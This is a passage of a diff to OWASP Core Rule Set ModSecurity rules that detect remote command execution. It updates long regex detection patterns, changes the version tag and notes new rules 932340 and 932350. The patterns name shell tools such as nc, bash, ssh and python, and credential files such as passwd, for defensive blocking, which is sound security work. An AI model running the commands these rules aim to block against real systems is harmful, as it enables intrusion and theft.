?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?2[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n|s)|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|]|$).*|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?f|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o|(?:[\s\x0b&\),<>\|]|$).*))\b" \ +SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|].*|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'[^']*'|\"[^\"]*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?2[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n|s)|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?f|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o|[\s\x0b&\),<>\|].*))\b" \ "id:932232,\ phase:2,\ block,\ @@ -1764,7 +1844,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:b[\ tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-RCE',\ tag:'capec/1000/152/248/88',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" @@ -1780,6 +1860,8 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:b[\ # # .932250 (base rule, PL1, targets two and three character commands) # .932260 (base rule, PL1, targets known command word of length > 3 without evasion) +# .932340 (PL-1, matches commands with no arguments) +# .932350 (PL-3, matches commands with no arguments) # # .932240 (generic detection, PL2, targets generic evasion attempts) # .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2, @@ -1805,7 +1887,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:b[\ # (consult https://coreruleset.org/docs/development/regex_assembly/ for details): # crs-toolchain regex update 932237 # -SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@rx (?i)\b(?:7z(?:[\s\x0b&\),<>\|]|$|[arx](?:[\s\x0b&\),<>\|]|$))|(?:(?:GE|POS)T|y(?:e(?:s|lp)|um|arn)|HEAD)(?:[\s\x0b&\),<>\|]|$)|a(?:a-[^\s\x0b]{1,10}\b|(?:b|w[ks]|l(?:ias|pine)|xel)(?:[\s\x0b&\),<>\|]|$)|p(?:t(?:[\s\x0b&\),<>\|]|$|-get|itude(?:[\s\x0b&\),<>\|]|$))|parmor_[^\s\x0b]{1,10}\b)|r(?:[\s\x0b&\),<>\|]|$|j(?:[\s\x0b&\),<>\|]|$|-register|disp)|(?:p|ch)(?:[\s\x0b&\),<>\|]|$)|ia2c)|s(?:[\s\x0b&\),<>\|]|$|h(?:[\s\x0b&\),<>\|]|$)|cii(?:-xfr|85)|pell)|t(?:[\s\x0b&\),<>\|]|$|obm(?:[\s\x0b&\),<>\|]|$))|dd(?:group|user)|getty|nsible|u(?:ditctl|repot|search))|b(?:z(?:(?:z|c(?:at|mp))(?:[\s\x0b&\),<>\|]|$)|diff|e(?:grep|xe(?:[\s\x0b&\),<>\|]|$))|f?grep|ip2(?:[\s\x0b&\),<>\|]|$|recover)|less|more)|a(?:s(?:e(?:32|64|n(?:ame(?:[\s\x0b&\),<>\|]|$)|c))|h(?:[\s\x0b&\),<>\|]|$))|tch(?:[\s\x0b&\),<>\|]|$))|lkid(?:[\s\x0b&\),<>\|]|$)|pftrace|r(?:eaksw|(?:idge|wap)(?:[\s\x0b&\),<>\|]|$))|sd(?:cat|iff|tar)|u(?:iltin|n(?:dler(?:[\s\x0b&\),<>\|]|$)|zip2)|s(?:ctl|ybox))|y(?:ebug|obu(?:[\s\x0b&\),<>\|]|$)))|c(?:[89]9(?:[\s\x0b&\),<>\|]|$|-gcc)|(?:a(?:t|ncel|psh)|c|mp)(?:[\s\x0b&\),<>\|]|$)|p(?:[\s\x0b&\),<>\|]|$|io(?:[\s\x0b&\),<>\|]|$)|ulimit)|s(?:(?:h|cli)(?:[\s\x0b&\),<>\|]|$)|plit|vtool)|u(?:t(?:[\s\x0b&\),<>\|]|$)|psfilter)|ertbot|h(?:(?:(?:att|di)r|mod|o(?:om|wn)|root|sh)(?:[\s\x0b&\),<>\|]|$)|e(?:ck_(?:by_ssh|cups|log|memory|raid|s(?:sl_cert|tatusfile))|f(?:[\s\x0b&\),\-<>\|]|$))|(?:flag|pas)s|g(?:passwd|rp(?:[\s\x0b&\),<>\|]|$)))|lang(?:\+\+|[\s\x0b&\),<>\|]|$)|o(?:bc(?:[\s\x0b&\),<>\|]|$|run)|lumn(?:[\s\x0b&\),<>\|]|$)|m(?:m(?:[\s\x0b&\),<>\|]|$|and(?:[\s\x0b&\),<>\|]|$))|p(?:oser|ress)(?:[\s\x0b&\),<>\|]|$))|proc|w(?:say|think))|r(?:ash(?:[\s\x0b&\),<>\|]|$)|on(?:[\s\x0b&\),<>\|]|$|tab)))|d(?:(?:[dfu]|i(?:(?:alo)?g|r|ff)|a(?:sh|te)|vips)(?:[\s\x0b&\),<>\|]|$)|nf(?:[\s\x0b&\),<>\|]|$)?|hclient|m(?:esg(?:[\s\x0b&\),<>\|]|$)|idecode|setup)|o(?:(?:as|ne)(?:[\s\x0b&\),<>\|]|$)|cker(?:[\s\x0b&\),\-<>\|]|$)|sbox)|pkg(?:[\s\x0b&\),\-<>\|]|$))|e(?:(?:[bd]|qn|cho|fax|grep|macs|val)(?:[\s\x0b&\),<>\|]|$)|n(?:v(?:[\s\x0b&\),<>\|]|$|-update)|d(?:if|sw)(?:[\s\x0b&\),<>\|]|$))|s(?:[\s\x0b&\),<>\|]|$|(?:h|ac)(?:[\s\x0b&\),<>\|]|$))|x(?:[\s\x0b&\),<>\|]|$|(?:ec|p(?:and|(?:ec|or)t|r))(?:[\s\x0b&\),<>\|]|$)|iftool)|2fsck|asy_install)|f(?:(?:c|mt|etch|lock|unction)(?:[\s\x0b&\),<>\|]|$)|d(?:[\s\x0b&\),<>\|]|$|(?:find|isk)(?:[\s\x0b&\),<>\|]|$)|u?mount)|g(?:[\s\x0b&\),<>\|]|$|rep(?:[\s\x0b&\),<>\|]|$))|i(?:[\s\x0b&\),<>\|]|$|le(?:[\s\x0b&\),<>\|]|$|test)|(?:n(?:d|ger)|sh)(?:[\s\x0b&\),<>\|]|$))|tp(?:[\s\x0b&\),<>\|]|$|stats|who)|acter|o(?:ld(?:[\s\x0b&\),<>\|]|$)|reach)|ping(?:[\s\x0b&\),6<>\|]|$))|g(?:c(?:c[^\s\x0b]{1,10}\b|ore(?:[\s\x0b&\),<>\|]|$))|(?:db|i(?:t|mp|nsh)|o|pg|awk|z(?:cat|exe|ip))(?:[\s\x0b&\),<>\|]|$)|e(?:m(?:[\s\x0b&\),<>\|]|$)|ni(?:e(?:[\s\x0b&\),<>\|]|$)|soimage)|t(?:cap|facl(?:[\s\x0b&\),<>\|]|$)))|hc(?:[\s\x0b&\),<>\|]|$|-(?:[\s\x0b&\),<>\|]|$)|i(?:[\s\x0b&\),\-<>\|]|$))|r(?:c(?:[\s\x0b&\),<>\|]|$|at(?:[\s\x0b&\),<>\|]|$))|ep(?:[\s\x0b&\),<>\|]|$)|oup(?:[\s\x0b&\),<>\|]|$|mod))|tester|unzip)|h(?:(?:d|up|ash|i(?:ghlight|story))(?:[\s\x0b&\),<>\|]|$)|e(?:ad(?:[\s\x0b&\),<>\|]|$)|xdump)|ost(?:id|name)|ping3|t(?:digest|op(?:[\s\x0b&\),<>\|]|$)|passwd))|i(?:(?:d|rb|conv|nstall)(?:[\s\x0b&\),<>\|]|$)|p(?:[\s\x0b&\),<>\|]|$|6?tables|config|p(?:eveprinter|find|tool))|f(?:config|top(?:[\s\x0b&\),<>\|]|$))|onice|spell)|j(?:(?:js|q|ava|exec)(?:[\s\x0b&\),<>\|]|$)|o(?:(?:bs|in)(?:[\s\x0b&\),<>\|]|$)|urnalctl)|runscript)|k(?:s(?:h(?:[\s\x0b&\),<>\|]|$)|shell)|ill(?:[\s\x0b&\),<>\|]|$|all)|nife(?:[\s\x0b&\),<>\|]|$))|l(?:d(?:[\s\x0b&\),<>\|]|$|d(?:[\s\x0b&\),<>\|]|$)|config)|(?:[np]|ynx)(?:[\s\x0b&\),<>\|]|$)|s(?:[\s\x0b&\),<>\|]|$|(?:-F|cpu|hw|mod|of|pci|usb)(?:[\s\x0b&\),<>\|]|$)|b_release)|ua(?:[\s\x0b&\),<>\|]|$|(?:la)?tex)|z(?:4(?:[\s\x0b&\),<>\|]|$|c(?:[\s\x0b&\),<>\|]|$|at))|(?:c(?:at|mp))?(?:[\s\x0b&\),<>\|]|$)|diff|[ef]?grep|less|m(?:a(?:[\s\x0b&\),<>\|]|$|dec|info)|ore))|a(?:st(?:[\s\x0b&\),<>\|]|$|comm(?:[\s\x0b&\),<>\|]|$)|log(?:in)?)|tex(?:[\s\x0b&\),<>\|]|$))|ess(?:[\s\x0b&\),<>\|]|$|echo|(?:fil|pip)e)|ftp(?:[\s\x0b&\),<>\|]|$|get)|o(?:(?:ca(?:l|te)|ok)(?:[\s\x0b&\),<>\|]|$)|g(?:inctl|(?:nam|sav)e)|setup)|trace|wp-(?:d(?:ownload|ump)|mirror|request))|m(?:a(?:(?:n|ke|wk)(?:[\s\x0b&\),<>\|]|$)|il(?:[\s\x0b&\),<>\|]|$|[qx](?:[\s\x0b&\),<>\|]|$))|ster\.passwd)|(?:tr|v|utt)(?:[\s\x0b&\),<>\|]|$)|k(?:(?:dir|nod)(?:[\s\x0b&\),<>\|]|$)|fifo|temp)|locate|o(?:(?:re|unt)(?:[\s\x0b&\),<>\|]|$)|squitto)|sg(?:attrib|c(?:at|onv)|filter|merge|uniq)|ysql(?:[\s\x0b&\),<>\|]|$|admin|dump(?:slow)?|hotcopy|show))|n(?:c(?:[\s\x0b&\),<>\|]|$|\.(?:openbsd|traditional)|at(?:[\s\x0b&\),<>\|]|$))|e(?:t(?:[\s\x0b&\),<>\|]|$|(?:c|st)at|kit-ftp|plan)|ofetch)|(?:(?:ul)?l|p(?:m|ing)|a(?:no|sm|wk)|ice|o(?:de|hup)|roff)(?:[\s\x0b&\),<>\|]|$)|m(?:[\s\x0b&\),<>\|]|$|ap(?:[\s\x0b&\),<>\|]|$))|s(?:enter|lookup|tat(?:[\s\x0b&\),<>\|]|$)))|o(?:(?:d|ctave)(?:[\s\x0b&\),<>\|]|$)|nintr|p(?:en(?:ssl|v(?:pn|t))|kg(?:[\s\x0b&\),<>\|]|$)))|p(?:a(?:(?:x|cman|rted|tch)(?:[\s\x0b&\),<>\|]|$)|s(?:swd|te(?:[\s\x0b&\),<>\|]|$)))|d(?:b(?:[\s\x0b&\),<>\|]|$|2mb|3(?:[\s\x0b&\),\.<>\|]|$))|f(?:la)?tex|ksh(?:[\s\x0b&\),<>\|]|$))|f(?:[\s\x0b&\),<>\|]|$|tp(?:[\s\x0b&\),<>\|]|$))|g(?:[\s\x0b&\),<>\|]|$|rep(?:[\s\x0b&\),<>\|]|$))|hp(?:[\s\x0b&\),<>\|]|$|-cgi|[57](?:[\s\x0b&\),<>\|]|$))|i(?:c(?:[\s\x0b&\),<>\|]|$|o(?:[\s\x0b&\),<>\|]|$))|p(?:[^\s\x0b]{1,10}\b|[\s\x0b&\),<>\|]|$)|dstat|(?:gz|ng6?)(?:[\s\x0b&\),<>\|]|$))|k(?:g(?:[\s\x0b&\),<>\|]|$|_?info)|exec|ill(?:[\s\x0b&\),<>\|]|$))|r(?:[\s\x0b&\),<>\|]|$|y(?:[\s\x0b&\),<>\|]|$)|int(?:env|f(?:[\s\x0b&\),<>\|]|$)))|s(?:[\s\x0b&\),<>\|]|$|(?:ed|ql)(?:[\s\x0b&\),<>\|]|$)|ftp)|t(?:x(?:[\s\x0b&\),<>\|]|$)|ar(?:[\s\x0b&\),<>\|]|$|diff|grep))|wd(?:[\s\x0b&\),<>\|]|$|\.db)|(?:xz|opd|u(?:ppet|shd))(?:[\s\x0b&\),<>\|]|$)|er(?:(?:f|ms)(?:[\s\x0b&\),<>\|]|$)|l(?:5?(?:[\s\x0b&\),<>\|]|$)|sh))|y(?:3?versions|thon[23]))|r(?:(?:a(?:r|k[eu])|bash|nano|oute|vi(?:ew|m))(?:[\s\x0b&\),<>\|]|$)|c(?:[\s\x0b&\),<>\|]|$|p(?:[\s\x0b&\),<>\|]|$))|e(?:d(?:[\s\x0b&\),<>\|]|$|carpet(?:[\s\x0b&\),<>\|]|$))|(?:v|boot|name|p(?:eat|lace))(?:[\s\x0b&\),<>\|]|$)|a(?:delf|lpath)|stic)|m(?:[\s\x0b&\),<>\|]|$|t(?:[\s\x0b&\),<>\|]|$|-(?:dump|tar))|dir(?:[\s\x0b&\),<>\|]|$)|user)|pm(?:[\s\x0b&\),<>\|]|$|db(?:[\s\x0b&\),<>\|]|$)|(?:quer|verif)y)|l(?:ogin|wrap)|sync(?:-ssl|[\s\x0b&\),<>\|]|$)|u(?:by[^\s\x0b]{1,10}\b|n(?:-(?:mailcap|parts)|c(?:[\s\x0b&\),<>\|]|$))))|s(?:(?:c(?:p|hed|r(?:een|ipt))|g|ash|diff|ftp|l(?:eep|sh))(?:[\s\x0b&\),<>\|]|$)|e(?:(?:d|ndmail|rvice)(?:[\s\x0b&\),<>\|]|$)|t(?:[\s\x0b&\),<>\|]|$|arch|cap|env|facl(?:[\s\x0b&\),<>\|]|$)|sid))|h(?:[\s\x0b&\),<>\|]|$|\.distrib|(?:adow|ells|u(?:f|tdown))(?:[\s\x0b&\),<>\|]|$))|s(?:[\s\x0b&\),<>\|]|$|h(?:[\s\x0b&\),<>\|]|$|-(?:a(?:dd|gent)|copy-id|key(?:ge|sca)n)|pass))|u(?:[\s\x0b&\),<>\|]|$|do(?:-rs|[\s\x0b&\),<>_\|]|$|edit|replay))|vn(?:[\s\x0b&\),<>\|]|$|a(?:dmin|uthz)|bench|dumpfilter|fsfs|look|mucc|rdump|s(?:erve|ync)|version)|mbclient|o(?:(?:(?:ca|r)t|urce)(?:[\s\x0b&\),<>\|]|$)|elim)|p(?:lit(?:[\s\x0b&\),<>\|]|$)|wd\.db)|qlite3|t(?:art-stop-daemon|d(?:buf|err|in(?:[\s\x0b&\),<>\|]|$)|out)|r(?:ace|ings(?:[\s\x0b&\),<>\|]|$)))|ys(?:ctl|tem(?:ctl|d-resolve)))|t(?:a(?:[cr](?:[\s\x0b&\),<>\|]|$)|il(?:[\s\x0b&\),<>\|]|$|f(?:[\s\x0b&\),<>\|]|$))|sk(?:[\s\x0b&\),<>\|]|$|set))|(?:bl|o(?:p|uch)|ftp|mux)(?:[\s\x0b&\),<>\|]|$)|c(?:p(?:[\s\x0b&\),<>\|]|$|dump|ing|traceroute)|l?sh(?:[\s\x0b&\),<>\|]|$))|e(?:[ex](?:[\s\x0b&\),<>\|]|$)|lnet)|i(?:c(?:[\s\x0b&\),<>\|]|$)|me(?:[\s\x0b&\),<>\|]|$|datectl|out(?:[\s\x0b&\),<>\|]|$)))|r(?:aceroute6?|off(?:[\s\x0b&\),<>\|]|$))|shark)|u(?:dp(?:[\s\x0b&\),<>\|]|$)|l(?:[\s\x0b&\),<>\|]|$|imit(?:[\s\x0b&\),<>\|]|$))|n(?:(?:ame|compress|iq|rar|s(?:et|hare)|xz)(?:[\s\x0b&\),<>\|]|$)|expand|l(?:ink(?:[\s\x0b&\),<>\|]|$)|z(?:4(?:[\s\x0b&\),<>\|]|$)|ma))|pigz|z(?:ip(?:[\s\x0b&\),<>\|]|$)|std))|p(?:2date(?:[\s\x0b&\),<>\|]|$)|date-alternatives)|ser(?:(?:ad|mo)d|del)|u(?:de|en)code)|v(?:i(?:[\s\x0b&\),<>\|]|$|m(?:[\s\x0b&\),<>\|]|$|diff)|(?:[ep]w|gr|rsh)(?:[\s\x0b&\),<>\|]|$)|sudo(?:-rs)?)|algrind|olatility(?:[\s\x0b&\),<>\|]|$))|w(?:[\s\x0b&\),<>\|]|$|(?:c|a(?:ll|tch))(?:[\s\x0b&\),<>\|]|$)|h(?:o(?:[\s\x0b&\),<>\|]|$|ami|is(?:[\s\x0b&\),<>\|]|$))?|iptail(?:[\s\x0b&\),<>\|]|$))|i(?:reshark|sh(?:[\s\x0b&\),<>\|]|$)))|x(?:(?:(?:x|pa)d|args|term)(?:[\s\x0b&\),<>\|]|$)|z(?:[\s\x0b&\),<>\|]|$|c(?:at|mp)(?:[\s\x0b&\),<>\|]|$)|d(?:ec(?:[\s\x0b&\),<>\|]|$)|iff)|[ef]?grep|less|more)|e(?:latex|tex(?:[\s\x0b&\),<>\|]|$))|mo(?:dmap|re(?:[\s\x0b&\),<>\|]|$)))|z(?:ip(?:[\s\x0b&\),<>\|]|$|c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|s(?:h(?:[\s\x0b&\),<>\|]|$)|oelim|td(?:[\s\x0b&\),<>\|]|$|(?:ca|m)t|grep|less))|athura|(?:c(?:at|mp)|diff|grep|less|run)(?:[\s\x0b&\),<>\|]|$)|e(?:grep|ro(?:[\s\x0b&\),<>\|]|$))|fgrep|mo(?:dload|re(?:[\s\x0b&\),<>\|]|$))|ypper))(?:\b|[^0-9A-Z_a-z])" \ +SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@rx 